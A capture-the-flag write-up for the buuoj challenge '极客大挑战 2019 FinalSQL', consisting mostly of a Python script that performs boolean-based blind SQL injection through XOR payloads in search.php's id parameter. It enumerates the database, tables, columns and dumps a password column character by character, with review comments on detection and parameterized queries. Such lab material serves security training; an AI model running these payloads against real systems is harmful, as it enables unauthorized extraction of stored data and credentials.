buuoj [极客大挑战 2019]FinalSQL

本文深入探讨了SQL注入攻击的原理和技术实现,通过实例代码详细解释了如何利用SQL注入漏洞获取数据库信息,包括数据库名、表名、列名及数据内容。


import requests


#database length
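def get_database_length():
    """Print the length of the current database name.

    Requests search.php?id=1^1^(length(database())=N) for N = 0, 1, 2, ...
    and stops at the first response whose body contains "Click".
    1^1^(cond) is 1 when cond holds and 0 otherwise, so the marker
    presumably appears only on the id=1 page -- confirm against the target.

    NOTE(review): the oracle only exists if search.php places the id value
    into its SQL statement as text; binding id as an integer parameter on
    the server would close it (inferred -- the server code is not shown).
    Each guess is one GET, so the access log shows a run of near-identical
    search.php requests carrying length(database()) in id.
    """
    count = 0
    # No upper bound: if the marker never appears this keeps requesting.
    while True:
        url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database())={0})".format(count)
        html = requests.get(url)
        if "Click" in html.text:
            # Fixed: the original printed the undefined name `i` here and
            # raised NameError at the moment the length was found.
            print(count)
            break
        count += 1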
#database
def get_database_name():
    """Print the current database name, one character per request hit.

    For positions 1..4 (hard-coded; presumably the length reported by
    get_database_length) every ASCII code 33..127 is tried in
    ascii(substr((select(database())),pos,1))=code until a response
    contains "Click". Each matched character is printed as it is found,
    then the assembled name.

    A position whose character is outside 33..127 matches nothing and is
    skipped silently, so the printed name can be shorter than expected.

    NOTE(review): up to 95 GETs per position against one endpoint; request
    logs or a WAF rule keyed on ascii(substr( in the id parameter would
    surface this traffic.
    """
    template = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(database())),{0},1))={1})"
    recovered = ""
    for position in range(1, 5):
        for code in range(33, 128):
            response = requests.get(template.format(position, code))
            if "Click" not in response.text:
                continue
            letter = chr(code)
            recovered += letter
            print(letter)
            break
    print(recovered)

#tables name length
def get_tables_name_length():
    """Print the length of the comma-joined table names in schema 'geek'.

    Compares length(group_concat(table_name)) from information_schema.tables
    (cast with CONVERT(..., SIGNED)) against 0, 1, 2, ... and stops at the
    first response containing "Click". Every guess is printed before it is
    checked, and the matching value is printed a second time.

    NOTE(review): the query reads information_schema, so the database
    account behind search.php can evidently enumerate metadata; a
    parameterized id is the control to verify on the server side.
    """
    template = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(SELECT(CONVERT((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema='geek')),SIGNED))={0})"
    guess = 0
    # Unbounded: runs until the marker shows up in a response.
    while True:
        response = requests.get(template.format(guess))
        print(guess)  # progress output for each attempt
        if "Click" in response.text:
            print(guess)
            return
        guess += 1


#tables
def get_tables_name():
    """Print the comma-joined table names of schema 'geek'.

    Reads positions 1..16 (hard-coded; presumably the value printed by
    get_tables_name_length) of group_concat(table_name), testing ASCII
    codes 33..127 per position and treating "Click" in the response body
    as a match. Matched characters are printed individually, then the
    whole string.

    A character outside 33..127 produces no match and is dropped without
    notice.
    """
    template = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{0},1))={1})"
    recovered = ""
    for position in range(1, 17):
        for code in range(33, 128):
            response = requests.get(template.format(position, code))
            if "Click" not in response.text:
                continue
            letter = chr(code)
            recovered += letter
            print(letter)
            break
    print(recovered)
    
def get_colums_name_length():
    """Print the length of the comma-joined column names of table F1naI1y.

    Compares length(group_concat(column_name)) from
    information_schema.columns (cast with CONVERT(..., SIGNED)) against
    0, 1, 2, ... until a response contains "Click". Each guess is printed
    before the check and the matching one is printed again.

    NOTE(review): the filter is table_name only, with no table_schema
    condition, so same-named tables in other schemas would be counted too.
    """
    template = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(SELECT(CONVERT((select(length(group_concat(column_name)))from(information_schema.columns)where(table_name='F1naI1y')),SIGNED))={0})"
    guess = 0
    # Unbounded: runs until the marker shows up in a response.
    while True:
        response = requests.get(template.format(guess))
        print(guess)  # progress output for each attempt
        if "Click" in response.text:
            print(guess)
            return
        guess += 1
        
def get_colums_name():
    """Print the comma-joined column names of table F1naI1y.

    Reads positions 1..20 (hard-coded; presumably the value printed by
    get_colums_name_length) of group_concat(column_name), testing ASCII
    codes 33..127 per position with "Click" in the response body as the
    match signal. Matched characters are printed one by one, then the
    assembled string.

    NOTE(review): a later definition in this file reuses the name
    get_colums_name, so after the module loads this function is no longer
    reachable under that name.
    """
    template = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{0},1))={1})"
    recovered = ""
    for position in range(1, 21):
        for code in range(33, 128):
            response = requests.get(template.format(position, code))
            if "Click" not in response.text:
                continue
            letter = chr(code)
            recovered += letter
            print(letter)
            break
    print(recovered)
    
    
def get_data_name_length():
    """Print the length of the comma-joined password column of F1naI1y.

    Compares length(group_concat(password)) from F1naI1y (cast with
    CONVERT(..., SIGNED)) against 0, 1, 2, ... until a response contains
    "Click". Each guess is printed before the check and the matching one
    is printed again.

    NOTE(review): group_concat output is capped by the server's
    group_concat_max_len setting, so the reported length may be a
    truncated one -- confirm against the server configuration.
    """
    template = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(SELECT(CONVERT((select(length(group_concat(password)))from(F1naI1y)),SIGNED))={0})"
    guess = 0
    # Unbounded: runs until the marker shows up in a response.
    while True:
        response = requests.get(template.format(guess))
        print(guess)  # progress output for each attempt
        if "Click" in response.text:
            print(guess)
            return
        guess += 1
        
def get_colums_name():
    """Print the comma-joined values of the password column of F1naI1y.

    Reads positions 1..213 (hard-coded; presumably the value printed by
    get_data_name_length) of group_concat(password), testing ASCII codes
    33..127 per position with "Click" in the response body as the match
    signal. Matched characters are printed one by one, then the assembled
    string. Characters outside 33..127 are dropped without notice.

    NOTE(review): despite its name this reads row data, not column names,
    and it redefines get_colums_name from earlier in the file; the name is
    kept so existing references still resolve.
    NOTE(review): the stored values come back exactly as stored, at up to
    95 GETs per position; a parameterized id and a database account
    limited to the tables search.php needs are the server-side controls
    to check.
    """
    template = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{0},1))={1})"
    recovered = ""
    for position in range(1, 214):
        for code in range(33, 128):
            response = requests.get(template.format(position, code))
            if "Click" not in response.text:
                continue
            letter = chr(code)
            recovered += letter
            print(letter)
            break
    print(recovered)
